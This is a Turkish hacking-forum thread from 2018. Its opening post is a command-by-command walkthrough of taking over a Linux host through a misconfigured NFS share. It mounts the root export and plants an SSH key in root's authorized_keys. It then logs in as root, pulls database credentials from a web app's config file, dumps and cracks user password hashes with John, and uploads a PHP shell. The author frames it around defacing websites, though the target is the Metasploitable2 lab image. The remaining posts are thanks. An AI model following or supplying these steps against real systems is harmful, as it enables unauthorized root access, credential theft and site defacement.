THT DUYURU

chat
Genel Güvenlik Web, Gprs, Wap, Üzerinde Gizlenmek İçin Neler Yapmanız Gerekenler ...

ugursuz reklam
takipci
Seçenekler

NFS Protokolü ve Zafiyetini Sömürme

THE DARK ARMY - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2017
Nereden:
Gotham
Mesajlar:
213
Konular:
35
Teşekkür (Etti):
58
Teşekkür (Aldı):
46
Ticaret:
(0) %
6
5241
25-01-2018 15:52
#1
Selamun Aleyküm
NFS diye bir protokol var hepimizin bildiği üzere.Bu protokolü bilmiyorsanız şimdi öğreniceksiniz.
Öyleyse başlayalım

NFS kısaca “Yerel*bir*ağda,*birbirine*bağlı*Linux*sistemlerin ,*aralarında*
dosya*paylaşımını*sağlayan*bir*teknolojidir”
● Veri depolamada ucuzluk sağlar
● /etc/exports : Paylaşılan dosya bilgisi bu dosyadadır.
Sanırım bizi çok teknik detay bağlamıyor.Nasılsa bu kon nfs yapılandırması değil.Kısaca dosya paylaşım protokolü olduğunu gördük.


[COLOR="White"]
● nmap ile hedef sistemdeki servisleri listeledik :

● showmount -e hedefIP : Paylaşımları listeledik
● mkdir /tmp/nfs : /tmp dizinine nfs adında bir klasör oluşturduk.
● mount -t nfs <sunucu_adresi>:/<paylasim> <baglanacak_klasör>
istemci oluyoruz.Benim gireceğim komut ise böyle :
● mount -o nolock -t nfs 10.195.2.2:/ /tmp/nfs
● ssh-keygen
● cat .ssh/id_rsa.pub >> /tmp/nfs/root/.ssh/authorized_keys
● umount /tmp/nfs

● ssh root@10.195.2.2

● şimdi erişimimiz oldu işte.Ben bir defacer'sam ilk işim index atmak(!) olucaktır.
Şakasına diyorum zaten root olmuşuz tadını çıkaralım.Lakin bazı komutlar çalışmıyor.Sistem kaynaklı. "ls ,ln gibi" .Ben de python dan yararlanıcağım azıcık.Hava amak için yapıyor demeyin.
● Aslında sizde böyle hatalar vermiyecek.Size bu yoldan anlatmamın sebebi python etkileşimli kabuğun gücünü göstermek hem fena mı olur azıcık python bilginiz olsa.

● ls hataverdi.Yani o klasördeki dosyaları listeleyemiyorum.
● Ben de deface yapacağım web uygulamasının dizinine gidiyorum.(cd komutuyla)
● python yazıp etkileşimli kabuğa geçiş yapıyorum.
● os modülünü aktif ediyorum (import os)
● print os.listdir(".") ---> ile dosyaları listeliyorum
● config dizininde siteye ait gizli ve önemli dosyalar olduğunu tahmin ediyorum
● print os.listdir("config/.") --> ile config dizinindeki dosyaları listeliyorum.
● print open("config/config.inc.php").read() --> ile dosyayı okuyorum ve bana mysql(veritabanı) kullanıcı adı ve şifresini veriyor.
● mysql -u kullanıcı adı -p yazıp entera basarsanız şifre ister ve mysql bağlantısı kurmuş olursunuz.

● show databases; veritabanlarını listeler.
● use veritabanı ismi; ---> ismiverilen veritabanına geçiş yapar
use dvwa;
● show tables; --> tabloları listeliyorum
● select * from users; ---> bana kullanıcı adı şifreleri listeliyor.Son yaptığım veritabanı işine çoğunuz aşinasınızdır zaten sqlmap veya havij sayesinde.

● şifreler md5.kırmamız gerekicek.ben masaüstüme md5.txt ye kaydediyorum
admin:md5şifrenizburaya
● john aracıyla md5leri kırıyorum. md5 ne demek bilmeyenler araştırabilir.temel bir bilgidir.
● john --format=raw-MD5 /root/Desktop/md5.txt

● md5 ler kırıldı.admin panelinden giriş yapın.
● Benim yaptığım işlemlerin mantığını anlarsanız site wordpressmiş,joomlaymış,opencartmış bilmemneymiş vız gelir kolayca indirirsiniz evelAllah
.)
● upload kısmı arıyoruz veya shell atabilecek potansiyel bir zaafiyet.
Upload diye bir bölüm varmış girelim bakalım.Dosya upload etmeye yarıyormuş.Hemen kendi uploader.php dosyamı yüklüyorum.






●Gerisi sizde.Başta root oturumumuz vardı.Neden tekrar shell atmakla vs uğraştık derseniz.Anlatımımı zenginleştirmek için değişik yöntemlerin varlığını göstermek için o yollara başvurdum.

Kullanılan materyaller:
●Kali Linux
●m e t a s p l o i t a b l e 2
●beyin
--------------------- Türk Milletinin Karakteri Yüksektir
BİZ DÜŞMANI VURCAKSAK UYARMAYIZ !!!
AquieLL, BloodOFCannon Teşekkür etti.
AquieLL - ait Kullanıcı Resmi (Avatar)
Hevesli Üye
Üyelik tarihi:
07/2014
Nereden:
aquu.php
Mesajlar:
4.004
Konular:
629
Teşekkür (Etti):
815
Teşekkür (Aldı):
2309
Ticaret:
(0) %
25-01-2018 15:58
#2
Ellerine sağlık kardeşim devamını bekliyorum mutlaka.
---------------------

WWW.TÜRKHACKTEAM.ORG/TV
- AquieLL -
Siber Güvenlik


THE DARK ARMY Teşekkür etti.
THE DARK ARMY - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2017
Nereden:
Gotham
Mesajlar:
213
Konular:
35
Teşekkür (Etti):
58
Teşekkür (Aldı):
46
Ticaret:
(0) %
25-01-2018 16:17
#3
saolasın. inşAllah vaktim oldukça devamı gelir
--------------------- Türk Milletinin Karakteri Yüksektir
BİZ DÜŞMANI VURCAKSAK UYARMAYIZ !!!
THE DARK ARMY - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2017
Nereden:
Gotham
Mesajlar:
213
Konular:
35
Teşekkür (Etti):
58
Teşekkür (Aldı):
46
Ticaret:
(0) %
25-01-2018 21:40
#4
Alıntı:
AquieLL´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık kardeşim devamını bekliyorum mutlaka.
Birazcık yetki yükseltme ve forensics hakkında bilgi edindim.Onları paylaşmak istiyorum düşünceniz nedir ? (gerekli gereksiz gibisinden)

Word Press Sızma Testi İçin :
http://www.turkhackteam.org/web-serv...-part-1-a.html
--------------------- Türk Milletinin Karakteri Yüksektir
BİZ DÜŞMANI VURCAKSAK UYARMAYIZ !!!
Konu 'Black Warrior tarafından (30-01-2018 18:57 Saat 18:57 ) değiştirilmiştir.
versen5656 - ait Kullanıcı Resmi (Avatar)
Hevesli Üye
Üyelik tarihi:
02/2015
Mesajlar:
3.336
Konular:
70
Teşekkür (Etti):
10
Teşekkür (Aldı):
362
Ticaret:
(0) %
27-01-2018 12:21
#5
eline saglık
--------------------- 10101010101010100101010100000101010101
1111 0000 1111 000 111 000 11100 11111 00000 1111 0000 000111 188 177 191 178 185 184 186 187 192 193 190 178 179 175 176 194 195 196 197
101010101010101010100101
VATANMEVZUSU - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
12/2017
Mesajlar:
371
Konular:
39
Teşekkür (Etti):
16
Teşekkür (Aldı):
25
Ticaret:
(0) %
27-01-2018 12:51
#6
Eline Saglık
THE DARK ARMY - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2017
Nereden:
Gotham
Mesajlar:
213
Konular:
35
Teşekkür (Etti):
58
Teşekkür (Aldı):
46
Ticaret:
(0) %
27-01-2018 13:37
#7
Alıntı:
versen5656´isimli üyeden Alıntı Mesajı göster
eline saglık
Alıntı:
KaraMelek13´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık
Alıntı:
VATANMEVZUSU´isimli üyeden Alıntı Mesajı göster
Eline Saglık
Teşekkürler
--------------------- Türk Milletinin Karakteri Yüksektir
BİZ DÜŞMANI VURCAKSAK UYARMAYIZ !!!

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler